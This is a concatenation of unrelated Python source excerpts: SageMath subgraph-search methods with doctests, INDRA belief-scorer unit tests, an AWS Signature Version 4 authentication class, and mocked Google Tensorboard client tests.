- :meth:`~GenericGraph.subgraph_search_iterator` -- iterator over
the copies of `H` inside of `G`
ALGORITHM:
See the documentation of
:class:`~sage.graphs.generic_graph_pyx.SubgraphSearch`.
EXAMPLES:
The Petersen graph contains the path graph `P_5`::
sage: g = graphs.PetersenGraph()
sage: h1 = g.subgraph_search(graphs.PathGraph(5)); h1
Subgraph of (Petersen graph): Graph on 5 vertices
sage: h1.vertices(); h1.edges(labels=False)
[0, 1, 2, 3, 4]
[(0, 1), (1, 2), (2, 3), (3, 4)]
sage: I1 = g.subgraph_search(graphs.PathGraph(5), induced=True); I1
Subgraph of (Petersen graph): Graph on 5 vertices
sage: I1.vertices(); I1.edges(labels=False)
[0, 1, 2, 3, 8]
[(0, 1), (1, 2), (2, 3), (3, 8)]
It also contains the claw `K_{1,3}`::
sage: h2 = g.subgraph_search(graphs.ClawGraph()); h2
Subgraph of (Petersen graph): Graph on 4 vertices
sage: h2.vertices(); h2.edges(labels=False)
[0, 1, 4, 5]
[(0, 1), (0, 4), (0, 5)]
sage: I2 = g.subgraph_search(graphs.ClawGraph(), induced=True); I2
Subgraph of (Petersen graph): Graph on 4 vertices
sage: I2.vertices(); I2.edges(labels=False)
[0, 1, 4, 5]
[(0, 1), (0, 4), (0, 5)]
Of course the induced copies are isomorphic to the graphs we were
looking for::
sage: I1.is_isomorphic(graphs.PathGraph(5))
True
sage: I2.is_isomorphic(graphs.ClawGraph())
True
However, the Petersen graph does not contain a subgraph isomorphic to
`K_3`::
sage: g.subgraph_search(graphs.CompleteGraph(3)) is None
True
Nor does it contain a nonempty induced subgraph isomorphic to `P_6`::
sage: g.subgraph_search(graphs.PathGraph(6), induced=True) is None
True
The empty graph is a subgraph of every graph::
sage: g.subgraph_search(graphs.EmptyGraph())
Graph on 0 vertices
sage: g.subgraph_search(graphs.EmptyGraph(), induced=True)
Graph on 0 vertices
The subgraph may just have edges missing::
sage: k3 = graphs.CompleteGraph(3); p3 = graphs.PathGraph(3)
sage: k3.relabel(list('abc'))
sage: s = k3.subgraph_search(p3)
sage: s.edges(labels=False)
[('a', 'b'), ('b', 'c')]
Of course, `P_3` is not an induced subgraph of `K_3`, though::
sage: k3 = graphs.CompleteGraph(3); p3 = graphs.PathGraph(3)
sage: k3.relabel(list('abc'))
sage: k3.subgraph_search(p3, induced=True) is None
True
If the graph has labels, the labels are just ignored::
sage: g.set_vertex(0, 'foo')
sage: c = g.subgraph_search(graphs.PathGraph(5))
sage: c.get_vertices()
{0: 'foo', 1: None, 2: None, 3: None, 4: None}
TESTS:
Inside of a small graph (:trac:`13906`)::
sage: Graph(5).subgraph_search(Graph(1))
Graph on 1 vertex
For labelled edges (:trac:`14999`)::
sage: G = graphs.CompleteGraph(10)
sage: C = G.subgraph_search(graphs.CycleGraph(4))
sage: C.size()
4
sage: C.edges()
[(0, 1, None), (0, 3, None), (1, 2, None), (2, 3, None)]
sage: for (u,v) in G.edges(labels=False):
....: G.set_edge_label(u, v, u)
sage: C = G.subgraph_search(graphs.CycleGraph(4))
sage: C.edges()
[(0, 1, 0), (0, 3, 0), (1, 2, 1), (2, 3, 2)]
"""
from sage.graphs.generic_graph_pyx import SubgraphSearch
from sage.graphs.graph_generators import GraphGenerators
if not G.order():
return GraphGenerators().EmptyGraph()
# SubgraphSearch assumes the graph we are searching for has order at least 2.
if G.order() == 1:
if self.order() >= 1:
from sage.graphs.graph import Graph
return Graph({next(self.vertex_iterator()): []})
else:
return None
S = SubgraphSearch(self, G, induced=induced)
for g in S:
if induced:
return self.subgraph(g)
else:
Gcopy = copy(G)
Gcopy.relabel(g)
return self.subgraph(vertices=Gcopy, edges=Gcopy.edges(labels=False, sort=False))
return None
def subgraph_search_count(self, G, induced=False):
r"""
Return the number of labelled occurrences of ``G`` in ``self``.
INPUT:
- ``G`` -- the (di)graph whose copies we are looking for in ``self``
- ``induced`` -- boolean (default: ``False``); whether or not to count
induced copies of ``G`` in ``self``
.. NOTE::
The vertex labels and the edge labels in the graph are ignored.
ALGORITHM:
See the documentation of
:class:`~sage.graphs.generic_graph_pyx.SubgraphSearch`.
.. SEEALSO::
- :meth:`~GenericGraph.subgraph_search` -- finds an subgraph
isomorphic to `H` inside of a graph `G`
- :meth:`~GenericGraph.subgraph_search_iterator` -- iterator over
the copies of a graph `H` inside of a graph `G`
EXAMPLES:
Counting the number of paths `P_5` in a PetersenGraph::
sage: g = graphs.PetersenGraph()
sage: g.subgraph_search_count(graphs.PathGraph(5))
240
Requiring these subgraphs be induced::
sage: g.subgraph_search_count(graphs.PathGraph(5), induced=True)
120
If we define the graph `T_k` (the transitive tournament on `k` vertices)
as the graph on `\{0, ..., k-1\}` such that `ij \in T_k` if `i<j`, how
many directed triangles can be found in `T_5` ? The answer is of course
`0`::
sage: T5 = digraphs.TransitiveTournament(5)
sage: T5.subgraph_search_count(digraphs.Circuit(3))
0
If we count instead the number of `T_3` in `T_5`, we expect
the answer to be `\binom{5}{3}`::
sage: T3 = digraphs.TransitiveTournament(3)
sage: T5.subgraph_search_count(T3)
10
sage: binomial(5,3)
10
sage: T3.is_isomorphic(T5.subgraph(vertices=[0, 1, 2]))
True
The empty graph is a subgraph of every graph::
sage: g.subgraph_search_count(graphs.EmptyGraph())
1
If the graph has vertex labels or edge labels, the label is just ignored::
sage: g.set_vertex(0, 'foo')
sage: g.subgraph_search_count(graphs.PathGraph(5))
240
TESTS:
Inside of a small graph (:trac:`13906`)::
sage: Graph(5).subgraph_search_count(Graph(1))
5
"""
from sage.graphs.generic_graph_pyx import SubgraphSearch
if not G.order():
return 1
if not self.order():
return 0
if G.order() == 1:
return self.order()
S = SubgraphSearch(self, G, induced=induced)
return S.cardinality()
def subgraph_search_iterator(self, G, induced=False):
r"""
Return an iterator over the labelled copies of ``G`` in ``self``.
INPUT:
- ``G`` -- the graph whose copies we are looking for in ``self``
- ``induced`` -- boolean (default: ``False``); whether or not to iterate
over the induced copies of ``G`` in ``self``
.. NOTE::
The vertex labels and the edge labels in the graph are ignored.
ALGORITHM:
See the documentation of
:class:`~sage.graphs.generic_graph_pyx.SubgraphSearch`.
OUTPUT:
Iterator over the labelled copies of ``G`` in ``self``, as *lists*. For
each value `(v_1, v_2, ..., v_k)` returned, the first vertex of `G` is
associated with `v_1`, the second with `v_2`, etc.
.. NOTE::
This method also works on digraphs.
.. SEEALSO::
- :meth:`~GenericGraph.subgraph_search` -- finds an subgraph
isomorphic to `H` inside of `G`
- :meth:`~GenericGraph.subgraph_search_count` -- counts the number
of copies of `H` inside of `G`
EXAMPLES:
Iterating through all the labelled `P_3` of `P_5`::
sage: g = graphs.PathGraph(5)
sage: for p in g.subgraph_search_iterator(graphs.PathGraph(3)):
....: print(p)
[0, 1, 2]
[1, 2, 3]
[2, 1, 0]
[2, 3, 4]
[3, 2, 1]
[4, 3, 2]
If the graph has vertex labels or edge labels, the label is just ignored::
sage: g.set_vertex(0, 'foo')
sage: for p in g.subgraph_search_iterator(graphs.PathGraph(3)):
....: print(p)
[0, 1, 2]
[1, 2, 3]
[2, 1, 0]
[2, 3, 4]
[3, 2, 1]
[4, 3, 2]
TESTS:
Inside of a small graph (:trac:`13906`)::
sage: list(Graph(5).subgraph_search_iterator(Graph(1)))
[Graph on 1 vertex, Graph on 1 vertex, Graph on 1 vertex, Graph on 1 vertex, Graph on 1 vertex]
"""
if not G.order():
from sage.graphs.graph_generators import GraphGenerators
return [GraphGenerators().EmptyGraph()]
elif not self.order():
return []
elif G.order() == 1:
from sage.graphs.graph import Graph
return iter([Graph({v: []}) for v in self])
else:
from sage.graphs.generic_graph_pyx import SubgraphSearch
return SubgraphSearch(self, G, induced=induced)
def random_subgraph(self, p, inplace=False):
"""
Return a random subgraph containing each vertex with probability ``p``.
INPUT:
- ``p`` -- the probability of choosing a vertex
- ``inplace`` -- boolean (default: ``False``); using ``inplace=True``
will simply delete the extra vertices and edges from the current
graph. This will modify the graph.
EXAMPLES::
sage: P = graphs.PetersenGraph()
sage: P.random_subgraph(.25)
Subgraph of (Petersen graph): Graph on ... vert...
"""
p = float(p)
if p < 0 or p > 1:
raise ValueError("a probability must be in range [0..1]")
vertices = [v for v in | |
<filename>indra/tests/test_belief_sklearn.py<gh_stars>0
import random
import pickle
import numpy as np
from copy import copy
from collections import defaultdict
from os.path import join, abspath, dirname
from nose.tools import raises
from sklearn.linear_model import LogisticRegression
from indra.sources import signor
from indra.belief import BeliefEngine
from indra.tools import assemble_corpus as ac
from indra.statements import Evidence
from indra.belief.skl import CountsScorer
# A set of test statements derived from SIGNOR only
# (these include many different stmt types)
test_stmt_path = join(dirname(abspath(__file__)),
'belief_sklearn_test_stmts.pkl')
# An alternative set of test statements derived from the curated stmt dataset
# (these include supports/supported_by)
test_stmt_cur_path = join(dirname(abspath(__file__)),
'belief_sklearn_test_stmts_cur.pkl')
# A statement dataframe sample
test_df_path = join(dirname(abspath(__file__)),
'belief_sklearn_test_df.pkl')
with open(test_stmt_path, 'rb') as f:
test_stmts, y_arr_stmts = pickle.load(f)
with open(test_stmt_cur_path, 'rb') as f:
test_stmts_cur, y_arr_stmts_cur = pickle.load(f)
with open(test_df_path, 'rb') as f:
test_df, y_arr_df = pickle.load(f)
# A set of statements derived from Signor used for testing purposes.
def _dump_test_data(filename, num_per_type=10):
"""Get corpus of statements for testing that has a range of stmt types."""
sp = signor.process_from_web()
# Group statements by type
stmts_by_type = defaultdict(list)
for stmt in sp.statements:
stmts_by_type[stmt.__class__].append(stmt)
# Sample statements of each type (without replacement)
stmt_sample = []
for stmt_type, stmt_list in stmts_by_type.items():
if len(stmt_list) <= num_per_type:
stmt_sample.extend(stmt_list)
else:
stmt_sample.extend(random.sample(stmt_list, num_per_type))
# Make a random binary class vector for the stmt list
y_arr = [random.choice((0, 1)) for s in stmt_sample]
with open(test_stmt_path, 'wb') as f:
pickle.dump((stmt_sample, y_arr), f)
return stmt_sample
def test_counts_wrapper():
"""Instantiate counts wrapper and make stmt matrix"""
lr = LogisticRegression()
source_list = ['reach', 'sparser']
cw = CountsScorer(lr, source_list)
# Made this so it's not a ValueError, this may change back in the future
# depending on how we want to handle sources in statement data not seen
# in training.
# @raises(ValueError)
def test_missing_source():
"""Check that all source_apis in training data are in source list."""
lr = LogisticRegression()
source_list = ['reach', 'sparser']
cw = CountsScorer(lr, source_list)
# Should error because test stmts are from signor and signor
# is not in list
cw.stmts_to_matrix(test_stmts)
def test_stmts_to_matrix():
"""Check that all source_apis in training data are in source list."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
x_arr = cw.stmts_to_matrix(test_stmts)
assert isinstance(x_arr, np.ndarray), 'x_arr should be a numpy array'
assert x_arr.shape == (len(test_stmts), len(source_list)), \
'stmt matrix dimensions should match test stmts'
assert set(x_arr.sum(axis=0)) == set([0, 0, len(test_stmts)]), \
'Signor col should be 1 in every row, other cols 0.'
# Try again with statement type
cw = CountsScorer(lr, source_list, use_stmt_type=True)
num_types = len(cw.stmt_type_map)
x_arr = cw.stmts_to_matrix(test_stmts)
assert x_arr.shape == (len(test_stmts), len(source_list) + num_types), \
'matrix should have a col for sources and other cols for every ' \
'statement type.'
def test_fit_stmts():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
cw.fit(test_stmts, y_arr_stmts)
# Once the model is fit, the coef_ attribute should be defined
assert 'coef_' in cw.model.__dict__
def test_fit_stmts_predict_stmts():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
cw.fit(test_stmts, y_arr_stmts)
probs = cw.predict_proba(test_stmts)
assert probs.shape == (len(test_stmts), 2), \
'prediction results should have dimension (# stmts, # classes)'
log_probs = cw.predict_log_proba(test_stmts)
assert log_probs.shape == (len(test_stmts), 2), \
'prediction results should have dimension (# stmts, # classes)'
preds = cw.predict(test_stmts)
assert preds.shape == (len(test_stmts),), \
'prediction results should have dimension (# stmts)'
@raises(ValueError)
def test_check_df_cols_err():
"""Drop a required column and make sure we get a ValueError."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
cw.df_to_matrix(test_df.drop('stmt_type', axis=1))
def test_check_df_cols_noerr():
"""Test dataframe should not raise ValueError."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
cw.df_to_matrix(test_df)
def test_df_to_matrix():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
x_arr = cw.df_to_matrix(test_df)
assert isinstance(x_arr, np.ndarray), 'x_arr should be a numpy array'
assert x_arr.shape == (len(test_df), len(source_list)), \
'stmt matrix dimensions should match test stmts'
assert x_arr.shape == (len(test_df), len(source_list))
# Try again with statement type
cw = CountsScorer(lr, source_list, use_stmt_type=True)
num_types = len(cw.stmt_type_map)
x_arr = cw.df_to_matrix(test_df)
assert x_arr.shape == (len(test_df), len(source_list) + num_types), \
'matrix should have a col for sources and other cols for every ' \
'statement type.'
def test_fit_df():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'medscan', 'trips', 'rlimsp']
cw = CountsScorer(lr, source_list)
cw.fit(test_df, y_arr_df)
# Once the model is fit, the coef_ attribute should be defined
assert 'coef_' in cw.model.__dict__
def test_fit_stmts_pred_df():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
# Train on statement data
cw.fit(test_stmts, y_arr_stmts)
# Predict on DF data
probs = cw.predict_proba(test_df)
assert probs.shape == (len(test_df), 2), \
'prediction results should have dimension (# stmts, # classes)'
log_probs = cw.predict_log_proba(test_df)
assert log_probs.shape == (len(test_df), 2), \
'prediction results should have dimension (# stmts, # classes)'
preds = cw.predict(test_df)
assert preds.shape == (len(test_df),), \
'prediction results should have dimension (# stmts)'
def test_fit_df_pred_stmts():
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
# Train on statement data
cw.fit(test_df, y_arr_df)
# Predict on DF data
probs = cw.predict_proba(test_stmts)
assert probs.shape == (len(test_stmts), 2), \
'prediction results should have dimension (# stmts, # classes)'
log_probs = cw.predict_log_proba(test_stmts)
assert log_probs.shape == (len(test_stmts), 2), \
'prediction results should have dimension (# stmts, # classes)'
preds = cw.predict(test_stmts)
assert preds.shape == (len(test_stmts),), \
'prediction results should have dimension (# stmts)'
@raises(ValueError)
def test_check_missing_source_counts():
lr = LogisticRegression()
source_list = ['reach', 'sparser']
cw = CountsScorer(lr, source_list)
# Drop the source_counts column
df_no_sc = test_df.drop('source_counts', axis=1)
# Should error
cw.fit(df_no_sc, y_arr_df)
def test_check_source_columns():
lr = LogisticRegression()
source_list = ['reach', 'sparser']
cw = CountsScorer(lr, source_list)
# Drop the source_counts column
df_sc = test_df.drop('source_counts', axis=1)
# Add reach and sparser columns
df_sc['reach'] = 0
df_sc['sparser'] = 0
# Should not error
cw.fit(df_sc, y_arr_df)
def test_matrix_to_matrix():
"""Check that we get a matrix back when passed to to_matrix."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list)
# Train on statement data
stmt_arr = cw.to_matrix(test_df)
assert cw.to_matrix(stmt_arr) is stmt_arr, \
'If passed a numpy array to_matrix should return it back.'
@raises(ValueError)
def test_use_members_with_df():
"""Check that we can't set use_num_members when passing a DataFrame."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list, use_num_members=True)
# This should error because stmt DataFrame doesn't contain num_members
# info
stmt_arr = cw.to_matrix(test_df)
def test_use_members_with_stmts():
"""Check that we can set use_num_members when passing statements."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cw = CountsScorer(lr, source_list, use_num_members=True)
x_arr = cw.to_matrix(test_stmts)
assert x_arr.shape == (len(test_stmts), len(source_list)+1), \
'stmt matrix dimensions should match test stmts plus num_members'
def setup_belief():
# Make a model
lr = LogisticRegression()
# Get all the sources
source_list = CountsScorer.get_all_sources(test_stmts_cur)
cs = CountsScorer(lr, source_list)
# Train on curated stmt data
cs.fit(test_stmts_cur, y_arr_stmts_cur)
# Run predictions on test statements
probs = cs.predict_proba(test_stmts_cur)[:, 1]
# Now check if we get these same beliefs set on the statements when we
# run with the belief engine:
# Get scorer and belief engine instances for trained model
be = BeliefEngine(scorer=cs)
# Make a shallow copy of the test stmts so that we don't change beliefs
# of the global instances as a side-effect of this test
test_stmts_copy = copy(test_stmts_cur)
return be, test_stmts_copy, probs
def test_set_prior_probs():
# Get probs for a set of statements, and a belief engine instance
be, test_stmts_copy, probs = setup_belief()
# Set beliefs
be.set_prior_probs(test_stmts_copy)
beliefs = [s.belief for s in test_stmts_copy]
# Check that they match
assert np.allclose(beliefs, probs), \
"Statement beliefs should be set to predicted probabilities."
@raises(NotImplementedError)
def test_df_extra_ev_value_error():
"""to_matrix should raise NotImplementError if given a DataFrame and extra
evidence (for now)."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cs = CountsScorer(lr, source_list)
cs.to_matrix(test_df, extra_evidence=[[5]])
@raises(ValueError)
def test_extra_evidence_length():
"""Should raise ValueError because the extra_evidence list is not the
same length as the list of statements."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cs = CountsScorer(lr, source_list)
extra_ev = [[5]]
x_arr = cs.stmts_to_matrix(test_stmts, extra_evidence=extra_ev)
@raises(ValueError)
def test_extra_evidence_content():
"""Should raise ValueError if extra_evidence list entries are not
Evidence objects or empty lists."""
lr = LogisticRegression()
source_list = ['reach', 'sparser', 'signor']
cs = CountsScorer(lr, source_list)
extra_ev = ([[5]] * (len(test_stmts) - 1)) + [[]]
x_arr = cs.stmts_to_matrix(test_stmts, extra_evidence=extra_ev)
def test_set_hierarchy_probs():
# Get probs for a set of statements, and a belief engine instance
be, test_stmts_copy, prior_probs = setup_belief()
# | |
in an unrecognised
format. If one or both of the two headers are present
yet neither are in a format which AWS4Auth recognises
then it will remove both headers and replace with a new
X-Amz-Date header using the current date.
If this behaviour is not wanted, set the
raise_invalid_date keyword argument to True, and
instead an InvalidDateError will be raised when neither
date is recognised. If neither header is present at all
then an X-Amz-Date header will still be added containing
the current date.
See the AWS4Auth class docstring for supported date
formats.
session_token
-- Must be supplied as keyword argument. If session_token
is set, then it is used for the x-amz-security-token
header, for use with STS temporary credentials.
refreshable_credentials
-- A botocore.credentials.RefreshableCredentials instance.
Must be supplied as keyword argument. This instance is
used to generate valid per-request static credentials,
without needing to re-generate the AWS4Auth instance.
If refreshable_credentials is set, the following arguments
are ignored: access_id, secret_key, signing_key,
session_token.
"""
self.signing_key = None
self.refreshable_credentials = kwargs.get('refreshable_credentials', None)
if self.refreshable_credentials:
# instantiate from refreshable_credentials
self.service = kwargs.get('service', None)
if not self.service:
raise TypeError('service must be provided as keyword argument when using refreshable_credentials')
self.region = kwargs.get('region', None)
if not self.region:
raise TypeError('region must be provided as keyword argument when using refreshable_credentials')
self.date = kwargs.get('date', None)
self.default_include_headers.append('x-amz-security-token')
else:
l = len(args)
if l not in [2, 4, 5]:
msg = 'AWS4Auth() takes 2, 4 or 5 arguments, {} given'.format(l)
raise TypeError(msg)
self.access_id = args[0]
if isinstance(args[1], AWS4SigningKey) and l == 2:
# instantiate from signing key
self.signing_key = args[1]
self.region = self.signing_key.region
self.service = self.signing_key.service
self.date = self.signing_key.date
elif l in [4, 5]:
# instantiate from args
secret_key = args[1]
self.region = args[2]
self.service = args[3]
self.date = args[4] if l == 5 else None
self.regenerate_signing_key(secret_key=secret_key)
else:
raise TypeError()
self.session_token = kwargs.get('session_token')
if self.session_token:
self.default_include_headers.append('x-amz-security-token')
raise_invalid_date = kwargs.get('raise_invalid_date', False)
if raise_invalid_date in [True, False]:
self.raise_invalid_date = raise_invalid_date
else:
raise ValueError('raise_invalid_date must be True or False in AWS4Auth.__init__()')
self.include_hdrs = kwargs.get('include_hdrs',
self.default_include_headers)
AuthBase.__init__(self)
def regenerate_signing_key(self, secret_key=None, region=None,
service=None, date=None):
"""
Regenerate the signing key for this instance. Store the new key in
signing_key property.
Take scope elements of the new key from the equivalent properties
(region, service, date) of the current AWS4Auth instance. Scope
elements can be overridden for the new key by supplying arguments to
this function. If overrides are supplied update the current AWS4Auth
instance's equivalent properties to match the new values.
If secret_key is not specified use the value of the secret_key property
of the current AWS4Auth instance's signing key. If the existing signing
key is not storing its secret key (i.e. store_secret_key was set to
False at instantiation) then raise a NoSecretKeyError and do not
regenerate the key. In order to regenerate a key which is not storing
its secret key, secret_key must be supplied to this function.
Use the value of the existing key's store_secret_key property when
generating the new key. If there is no existing key, then default
to setting store_secret_key to True for new key.
"""
if secret_key is None and (self.signing_key is None or
self.signing_key.secret_key is None):
raise NoSecretKeyError
secret_key = secret_key or self.signing_key.secret_key
region = region or self.region
service = service or self.service
date = date or self.date
if self.signing_key is None:
store_secret_key = True
else:
store_secret_key = self.signing_key.store_secret_key
self.signing_key = AWS4SigningKey(secret_key, region, service, date,
store_secret_key)
self.region = region
self.service = service
self.date = self.signing_key.date
def __call__(self, req):
"""
Interface used by Requests module to apply authentication to HTTP
requests.
Add x-amz-content-sha256 and Authorization headers to the request. Add
x-amz-date header to request if not already present and req does not
contain a Date header.
Check request date matches date in the current signing key. If not,
regenerate signing key to match request date.
If request body is not already encoded to bytes, encode to charset
specified in Content-Type header, or UTF-8 if not specified.
req -- Requests PreparedRequest object
"""
if self.refreshable_credentials:
# generate per-request static credentials
self.refresh_credentials()
# check request date matches scope date
req_date = self.get_request_date(req)
if req_date is None:
# no date headers or none in recognisable format
# replace them with x-amz-header with current date and time
if 'date' in req.headers: del req.headers['date']
if 'x-amz-date' in req.headers: del req.headers['x-amz-date']
now = datetime.datetime.utcnow()
req_date = now.date()
req.headers['x-amz-date'] = now.strftime('%Y%m%dT%H%M%SZ')
req_scope_date = req_date.strftime('%Y%m%d')
if req_scope_date != self.date:
self.handle_date_mismatch(req)
# encode body and generate body hash
if hasattr(req, 'body') and req.body is not None:
self.encode_body(req)
content_hash = hashlib.sha256(req.body)
else:
content_hash = hashlib.sha256(b'')
req.headers['x-amz-content-sha256'] = content_hash.hexdigest()
if self.session_token:
req.headers['x-amz-security-token'] = self.session_token
# generate signature
result = self.get_canonical_headers(req, self.include_hdrs)
cano_headers, signed_headers = result
cano_req = self.get_canonical_request(req, cano_headers,
signed_headers)
sig_string = self.get_sig_string(req, cano_req, self.signing_key.scope)
sig_string = sig_string.encode('utf-8')
hsh = hmac.new(self.signing_key.key, sig_string, hashlib.sha256)
sig = hsh.hexdigest()
auth_str = 'AWS4-HMAC-SHA256 '
auth_str += 'Credential={}/{}, '.format(self.access_id,
self.signing_key.scope)
auth_str += 'SignedHeaders={}, '.format(signed_headers)
auth_str += 'Signature={}'.format(sig)
req.headers['Authorization'] = auth_str
return req
def refresh_credentials(self):
temporary_creds = self.refreshable_credentials.get_frozen_credentials()
self.access_id = temporary_creds.access_key
self.session_token = temporary_creds.token
self.regenerate_signing_key(secret_key=temporary_creds.secret_key)
@classmethod
def get_request_date(cls, req):
"""
Try to pull a date from the request by looking first at the
x-amz-date header, and if that's not present then the Date header.
Return a datetime.date object, or None if neither date header
is found or is in a recognisable format.
req -- a requests PreparedRequest object
"""
date = None
for header in ['x-amz-date', 'date']:
if header not in req.headers:
continue
try:
date_str = cls.parse_date(req.headers[header])
except DateFormatError:
continue
try:
date = datetime.datetime.strptime(date_str, '%Y-%m-%d').date()
except ValueError:
continue
else:
break
return date
@staticmethod
def parse_date(date_str):
"""
Check if date_str is in a recognised format and return an ISO
yyyy-mm-dd format version if so. Raise DateFormatError if not.
Recognised formats are:
* RFC 7231 (e.g. Mon, 09 Sep 2011 23:36:00 GMT)
* RFC 850 (e.g. Sunday, 06-Nov-94 08:49:37 GMT)
* C time (e.g. Wed Dec 4 00:00:00 2002)
* Amz-Date format (e.g. 20090325T010101Z)
* ISO 8601 / RFC 3339 (e.g. 2009-03-25T10:11:12.13-01:00)
date_str -- Str containing a date and optional time
"""
months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug',
'sep', 'oct', 'nov', 'dec']
formats = {
# RFC 7231, e.g. 'Mon, 09 Sep 2011 23:36:00 GMT'
r'^(?:\w{3}, )?(\d{2}) (\w{3}) (\d{4})\D.*$':
lambda m: '{}-{:02d}-{}'.format(
m.group(3),
months.index(m.group(2).lower())+1,
m.group(1)),
# RFC 850 (e.g. Sunday, 06-Nov-94 08:49:37 GMT)
# assumes current century
r'^\w+day, (\d{2})-(\w{3})-(\d{2})\D.*$':
lambda m: '{}{}-{:02d}-{}'.format(
str(datetime.date.today().year)[:2],
m.group(3),
months.index(m.group(2).lower())+1,
m.group(1)),
# C time, e.g. 'Wed Dec 4 00:00:00 2002'
r'^\w{3} (\w{3}) (\d{1,2}) \d{2}:\d{2}:\d{2} (\d{4})$':
lambda m: '{}-{:02d}-{:02d}'.format(
m.group(3),
months.index(m.group(1).lower())+1,
int(m.group(2))),
# x-amz-date format dates, e.g. 20100325T010101Z
r'^(\d{4})(\d{2})(\d{2})T\d{6}Z$':
lambda m: '{}-{}-{}'.format(*m.groups()),
# ISO 8601 / RFC 3339, e.g. '2009-03-25T10:11:12.13-01:00'
r'^(\d{4}-\d{2}-\d{2})(?:[Tt].*)?$':
lambda m: m.group(1),
}
out_date = None
for regex, xform in formats.items():
m = re.search(regex, date_str)
if m:
out_date = xform(m)
break
if out_date is None:
raise DateFormatError
else:
return out_date
def handle_date_mismatch(self, req):
"""
Handle a request whose date doesn't match the signing key scope date.
This AWS4Auth class implementation regenerates the signing key. See
StrictAWS4Auth class if you would prefer an exception to be raised.
req -- a requests prepared request object
"""
req_datetime = self.get_request_date(req)
new_key_date = req_datetime.strftime('%Y%m%d')
self.regenerate_signing_key(date=new_key_date)
@staticmethod
def encode_body(req):
"""
Encode body of request to bytes and update content-type if required.
If the body of req is Unicode then encode to the charset found in
content-type header if present, otherwise UTF-8, or ASCII if
content-type is application/x-www-form-urlencoded. If encoding to UTF-8
then add charset to content-type. Modifies req directly, does not
return a modified copy.
req -- Requests PreparedRequest object
"""
if isinstance(req.body, text_type):
split = req.headers.get('content-type', 'text/plain').split(';')
if len(split) == 2:
ct, cs = split
cs = cs.split('=')[1]
req.body = req.body.encode(cs)
else:
ct = split[0]
if (ct == 'application/x-www-form-urlencoded' or
'x-amz-' in ct):
req.body = req.body.encode()
else:
req.body = req.body.encode('utf-8')
req.headers['content-type'] = ct + '; charset=utf-8'
def get_canonical_request(self, req, cano_headers, signed_headers):
"""
Create the AWS authentication Canonical | |
the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.GetTensorboardRunRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, tensorboard_run.TensorboardRun)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.description == "description_value"
assert response.etag == "etag_value"
def test_get_tensorboard_run_from_dict():
test_get_tensorboard_run(request_type=dict)
def test_get_tensorboard_run_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
client.get_tensorboard_run()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.GetTensorboardRunRequest()
@pytest.mark.asyncio
async def test_get_tensorboard_run_async(
transport: str = "grpc_asyncio",
request_type=tensorboard_service.GetTensorboardRunRequest,
):
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
tensorboard_run.TensorboardRun(
name="name_value",
display_name="display_name_value",
description="description_value",
etag="etag_value",
)
)
response = await client.get_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == tensorboard_service.GetTensorboardRunRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, tensorboard_run.TensorboardRun)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.description == "description_value"
assert response.etag == "etag_value"
@pytest.mark.asyncio
async def test_get_tensorboard_run_async_from_dict():
await test_get_tensorboard_run_async(request_type=dict)
def test_get_tensorboard_run_field_headers():
client = TensorboardServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = tensorboard_service.GetTensorboardRunRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_tensorboard_run), "__call__"
) as call:
call.return_value = tensorboard_run.TensorboardRun()
client.get_tensorboard_run(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_tensorboard_run_field_headers_async():
client = TensorboardServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
